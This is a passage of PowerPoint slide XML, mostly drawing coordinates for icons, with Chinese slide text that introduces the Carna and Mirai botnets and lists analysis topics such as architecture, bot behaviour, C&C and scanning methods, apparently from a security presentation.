                  <a:pt x="4145" y="21477"/>
                  <a:pt x="4328" y="21600"/>
                  <a:pt x="4552" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9040" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9264" y="21600"/>
                  <a:pt x="9447" y="21477"/>
                  <a:pt x="9447" y="21327"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9447" y="13672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12099" y="13672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12099" y="21327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12099" y="21477"/>
                  <a:pt x="12282" y="21600"/>
                  <a:pt x="12506" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16994" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17218" y="21600"/>
                  <a:pt x="17399" y="21477"/>
                  <a:pt x="17399" y="21327"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17399" y="21107"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17399" y="20979"/>
                  <a:pt x="17336" y="20853"/>
                  <a:pt x="17220" y="20751"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16357" y="19992"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16241" y="19890"/>
                  <a:pt x="16179" y="19764"/>
                  <a:pt x="16179" y="19636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16179" y="13672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16838" y="13672"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17173" y="13672"/>
                  <a:pt x="17444" y="13490"/>
                  <a:pt x="17444" y="13265"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17444" y="7843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18075" y="7843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18075" y="9364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18075" y="9530"/>
                  <a:pt x="18249" y="9669"/>
                  <a:pt x="18480" y="9703"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18480" y="10395"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18249" y="10429"/>
                  <a:pt x="18075" y="10568"/>
                  <a:pt x="18075" y="10734"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18075" y="13326"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18075" y="13518"/>
                  <a:pt x="18308" y="13672"/>
                  <a:pt x="18594" y="13672"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18790" y="13672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18136" y="14205"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18028" y="14293"/>
                  <a:pt x="17991" y="14412"/>
                  <a:pt x="18038" y="14521"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18498" y="15614"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18524" y="15676"/>
                  <a:pt x="18609" y="15719"/>
                  <a:pt x="18704" y="15719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19039" y="15719"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19157" y="15719"/>
                  <a:pt x="19250" y="15655"/>
                  <a:pt x="19250" y="15576"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19250" y="14788"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19250" y="14591"/>
                  <a:pt x="19488" y="14431"/>
                  <a:pt x="19781" y="14431"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20074" y="14431"/>
                  <a:pt x="20312" y="14591"/>
                  <a:pt x="20312" y="14788"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20312" y="15576"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20312" y="15655"/>
                  <a:pt x="20408" y="15719"/>
                  <a:pt x="20525" y="15719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20860" y="15719"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20955" y="15719"/>
                  <a:pt x="21038" y="15676"/>
                  <a:pt x="21064" y="15614"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21527" y="14521"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21573" y="14412"/>
                  <a:pt x="21536" y="14293"/>
                  <a:pt x="21429" y="14205"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20775" y="13672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20971" y="13672"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21256" y="13672"/>
                  <a:pt x="21489" y="13518"/>
                  <a:pt x="21489" y="13326"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21489" y="10734"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21489" y="10568"/>
                  <a:pt x="21313" y="10429"/>
                  <a:pt x="21081" y="10395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21081" y="9703"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21313" y="9669"/>
                  <a:pt x="21489" y="9530"/>
                  <a:pt x="21489" y="9364"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21489" y="5197"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21489" y="5006"/>
                  <a:pt x="21256" y="4850"/>
                  <a:pt x="20971" y="4850"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18594" y="4850"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18308" y="4850"/>
                  <a:pt x="18075" y="5006"/>
                  <a:pt x="18075" y="5197"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18075" y="5592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17444" y="5592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17444" y="4455"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17444" y="4230"/>
                  <a:pt x="17173" y="4048"/>
                  <a:pt x="16838" y="4048"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14503" y="4048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14503" y="2779"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14503" y="2688"/>
                  <a:pt x="14614" y="2614"/>
                  <a:pt x="14750" y="2614"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15102" y="2614"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15238" y="2614"/>
                  <a:pt x="15349" y="2541"/>
                  <a:pt x="15349" y="2450"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15349" y="1600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15349" y="1509"/>
                  <a:pt x="15238" y="1434"/>
                  <a:pt x="15102" y="1434"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14750" y="1434"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14614" y="1434"/>
                  <a:pt x="14503" y="1360"/>
                  <a:pt x="14503" y="1269"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14503" y="398"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14503" y="178"/>
                  <a:pt x="14238" y="0"/>
                  <a:pt x="13910" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7636" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9228" y="1434"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9713" y="1434"/>
                  <a:pt x="10106" y="1700"/>
                  <a:pt x="10106" y="2025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10106" y="2350"/>
                  <a:pt x="9713" y="2614"/>
                  <a:pt x="9228" y="2614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8743" y="2614"/>
                  <a:pt x="8351" y="2350"/>
                  <a:pt x="8351" y="2025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8351" y="1700"/>
                  <a:pt x="8743" y="1434"/>
                  <a:pt x="9228" y="1434"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12317" y="1434"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12802" y="1434"/>
                  <a:pt x="13195" y="1700"/>
                  <a:pt x="13195" y="2025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13195" y="2350"/>
                  <a:pt x="12802" y="2614"/>
                  <a:pt x="12317" y="2614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11832" y="2614"/>
                  <a:pt x="11440" y="2350"/>
                  <a:pt x="11440" y="2025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11440" y="1700"/>
                  <a:pt x="11832" y="1434"/>
                  <a:pt x="12317" y="1434"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8091" y="5474"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13454" y="5474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13454" y="7795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8091" y="7795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8091" y="5474"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8688" y="8716"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9016" y="8716"/>
                  <a:pt x="9281" y="8895"/>
                  <a:pt x="9281" y="9116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9281" y="9336"/>
                  <a:pt x="9016" y="9514"/>
                  <a:pt x="8688" y="9514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8359" y="9514"/>
                  <a:pt x="8091" y="9336"/>
                  <a:pt x="8091" y="9116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8091" y="8895"/>
                  <a:pt x="8359" y="8716"/>
                  <a:pt x="8688" y="8716"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10773" y="8716"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11102" y="8716"/>
                  <a:pt x="11369" y="8895"/>
                  <a:pt x="11369" y="9116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11369" y="9336"/>
                  <a:pt x="11102" y="9514"/>
                  <a:pt x="10773" y="9514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10444" y="9514"/>
                  <a:pt x="10177" y="9336"/>
                  <a:pt x="10177" y="9116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10177" y="8895"/>
                  <a:pt x="10444" y="8716"/>
                  <a:pt x="10773" y="8716"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12858" y="8716"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13187" y="8716"/>
                  <a:pt x="13454" y="8895"/>
                  <a:pt x="13454" y="9116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13454" y="9336"/>
                  <a:pt x="13187" y="9514"/>
                  <a:pt x="12858" y="9514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12530" y="9514"/>
                  <a:pt x="12265" y="9336"/>
                  <a:pt x="12265" y="9116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12265" y="8895"/>
                  <a:pt x="12530" y="8716"/>
                  <a:pt x="12858" y="8716"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10773" y="10277"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11801" y="10277"/>
                  <a:pt x="12768" y="10545"/>
                  <a:pt x="13495" y="11033"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11917" y="12093"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11612" y="11888"/>
                  <a:pt x="11205" y="11774"/>
                  <a:pt x="10773" y="11774"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10341" y="11774"/>
                  <a:pt x="9934" y="11888"/>
                  <a:pt x="9628" y="12093"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8051" y="11033"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8778" y="10545"/>
                  <a:pt x="9745" y="10277"/>
                  <a:pt x="10773" y="10277"/>
                </a:cubicBez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拥有鼻祖身份的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拥有鼻祖身份的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Carna Botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277803" y="3202935"/>
            <a:ext cx="2273916" cy="2245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7" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750199" y="2818711"/>
            <a:ext cx="1277847" cy="1262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" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880271" y="5764971"/>
            <a:ext cx="1277847" cy="1262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9" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8841372" y="3694816"/>
            <a:ext cx="1277847" cy="1262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0" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872666" y="5838158"/>
            <a:ext cx="871681" cy="860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油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9044455" y="2521129"/>
            <a:ext cx="871681" cy="860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先说两句"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="5689600"/>
            <a:ext cx="10464800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>先说两句</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="比起Carna Botnet，你耳熟能详的应该是…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="3816349"/>
            <a:ext cx="10464800" cy="1320801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>比起Carna Botnet，你耳熟能详的应该是</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Mirai Botnet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先说两句"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="5689600"/>
            <a:ext cx="10464800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>先说两句</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="然而如果2012年的Carna Botnet想做坏事，就不会有现在Mirai Botnet的光辉"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="3752850"/>
            <a:ext cx="10464800" cy="1447801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>然而如果2012年的Carna Botnet想做坏事，就不会有现在Mirai Botnet的光辉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剖析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剖析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="架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3422" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>架构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="463422" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>Bot行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="463422" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>C&amp;C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="463422" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>扫描方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="463422" indent="-463422" defTabSz="519937">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4093"/>
            </a:pPr>
            <a:r>
              <a:t>植入情况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="指纹"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9885611" y="4042076"/>
            <a:ext cx="2570128" cy="3676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4" h="21588" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="11315" y="2"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10522" y="-12"/>
                  <a:pt x="9695" y="42"/>
                  <a:pt x="8757" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8531" y="191"/>
                  <a:pt x="8383" y="343"/>
                  <a:pt x="8425" y="502"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8466" y="660"/>
                  <a:pt x="8683" y="764"/>
                  <a:pt x="8909" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10384" y="545"/>
                  <a:pt x="11723" y="487"/>
                  <a:pt x="13464" y="815"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13500" y="821"/>
                  <a:pt x="13535" y="825"/>
                  <a:pt x="13571" y="825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13754" y="825"/>
                  <a:pt x="13923" y="738"/>
                  <a:pt x="13973" y="608"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14032" y="452"/>
                  <a:pt x="13902" y="293"/>
                  <a:pt x="13680" y="251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12871" y="99"/>
                  <a:pt x="12109" y="17"/>
                  <a:pt x="11315" y="2"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10489" y="1122"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10183" y="1126"/>
                  <a:pt x="9883" y="1138"/>
                  <a:pt x="9591" y="1159"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7232" y="1324"/>
                  <a:pt x="5639" y="1854"/>
                  <a:pt x="4718" y="2268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4525" y="2355"/>
                  <a:pt x="4469" y="2535"/>
                  <a:pt x="4594" y="2670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4673" y="2757"/>
                  <a:pt x="4807" y="2804"/>
                  <a:pt x="4943" y="2804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5020" y="2804"/>
                  <a:pt x="5097" y="2790"/>
                  <a:pt x="5167" y="2759"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6011" y="2378"/>
                  <a:pt x="7480" y="1892"/>
                  <a:pt x="9675" y="1738"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11543" y="1607"/>
                  <a:pt x="14445" y="1888"/>
                  <a:pt x="15791" y="2514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15983" y="2603"/>
                  <a:pt x="16243" y="2564"/>
                  <a:pt x="16370" y="2430"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16497" y="2296"/>
                  <a:pt x="16444" y="2116"/>
                  <a:pt x="16253" y="2027"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15027" y="1457"/>
                  <a:pt x="12632" y="1095"/>
                  <a:pt x="10489" y="1122"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11050" y="2357"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10754" y="2349"/>
                  <a:pt x="10457" y="2350"/>
                  <a:pt x="10162" y="2361"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9824" y="2373"/>
                  <a:pt x="9488" y="2399"/>
                  <a:pt x="9154" y="2437"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6182" y="2777"/>
                  <a:pt x="4138" y="3394"/>
                  <a:pt x="1847" y="5679"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1715" y="5810"/>
                  <a:pt x="1761" y="5992"/>
                  <a:pt x="1949" y="6084"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2136" y="6177"/>
                  <a:pt x="2395" y="6146"/>
                  <a:pt x="2527" y="6014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4661" y="3886"/>
                  <a:pt x="6478" y="3333"/>
                  <a:pt x="9288" y="3011"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11727" y="2732"/>
                  <a:pt x="14345" y="3216"/>
                  <a:pt x="16290" y="4307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17860" y="5186"/>
                  <a:pt x="19546" y="7126"/>
                  <a:pt x="18665" y="11366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18632" y="11525"/>
                  <a:pt x="18787" y="11673"/>
                  <a:pt x="19015" y="11696"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19035" y="11698"/>
                  <a:pt x="19057" y="11698"/>
                  <a:pt x="19077" y="11698"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19280" y="11698"/>
                  <a:pt x="19456" y="11594"/>
                  <a:pt x="19486" y="11449"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20004" y="8958"/>
                  <a:pt x="19960" y="5619"/>
                  <a:pt x="16809" y="3853"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15181" y="2940"/>
                  <a:pt x="13123" y="2416"/>
                  <a:pt x="11050" y="2357"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17948" y="3011"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17842" y="3016"/>
                  <a:pt x="17738" y="3049"/>
                  <a:pt x="17662" y="3110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17512" y="3231"/>
                  <a:pt x="17531" y="3417"/>
                  <a:pt x="17705" y="3522"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19030" y="4332"/>
                  <a:pt x="19901" y="5435"/>
                  <a:pt x="20295" y="6804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20335" y="6942"/>
                  <a:pt x="20508" y="7039"/>
                  <a:pt x="20702" y="7039"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20729" y="7039"/>
                  <a:pt x="20756" y="7036"/>
                  <a:pt x="20784" y="7032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21009" y="7000"/>
                  <a:pt x="21154" y="6847"/>
                  <a:pt x="21109" y="6689"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20677" y="5192"/>
                  <a:pt x="19717" y="3978"/>
                  <a:pt x="18250" y="3082"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18164" y="3030"/>
                  <a:pt x="18054" y="3006"/>
                  <a:pt x="17948" y="3011"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11154" y="3788"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10635" y="3792"/>
                  <a:pt x="10208" y="3802"/>
                  <a:pt x="9814" y="3823"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9585" y="3835"/>
                  <a:pt x="9412" y="3976"/>
                  <a:pt x="9430" y="4136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9447" y="4297"/>
                  <a:pt x="9648" y="4415"/>
                  <a:pt x="9876" y="4404"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10252" y="4384"/>
                  <a:pt x="10661" y="4374"/>
                  <a:pt x="11161" y="4371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14113" y="4354"/>
                  <a:pt x="15680" y="5594"/>
                  <a:pt x="16476" y="6641"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16846" y="7126"/>
                  <a:pt x="17053" y="7891"/>
                  <a:pt x="17079" y="8851"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17100" y="9607"/>
                  <a:pt x="17002" y="10370"/>
                  <a:pt x="16903" y="10833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16869" y="10993"/>
                  <a:pt x="17026" y="11142"/>
                  <a:pt x="17253" y="11166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17274" y="11168"/>
                  <a:pt x="17295" y="11169"/>
                  <a:pt x="17315" y="11169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17517" y="11169"/>
                  <a:pt x="17693" y="11065"/>
                  <a:pt x="17724" y="10920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17791" y="10611"/>
                  <a:pt x="18341" y="7853"/>
                  <a:pt x="17211" y="6367"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16476" y="5401"/>
                  <a:pt x="14723" y="3788"/>
                  <a:pt x="11226" y="3788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11202" y="3788"/>
                  <a:pt x="11179" y="3788"/>
                  <a:pt x="11154" y="3788"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7747" y="4101"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7693" y="4099"/>
                  <a:pt x="7638" y="4103"/>
                  <a:pt x="7584" y="4115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6328" y="4411"/>
                  <a:pt x="5310" y="4929"/>
                  <a:pt x="4383" y="5747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2175" y="7694"/>
                  <a:pt x="2672" y="10159"/>
                  <a:pt x="2988" y="11129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3488" y="12660"/>
                  <a:pt x="5288" y="15181"/>
                  <a:pt x="7328" y="16583"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9933" y="18374"/>
                  <a:pt x="12638" y="19625"/>
                  <a:pt x="17375" y="19905"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17386" y="19905"/>
                  <a:pt x="17400" y="19905"/>
                  <a:pt x="17412" y="19905"/>
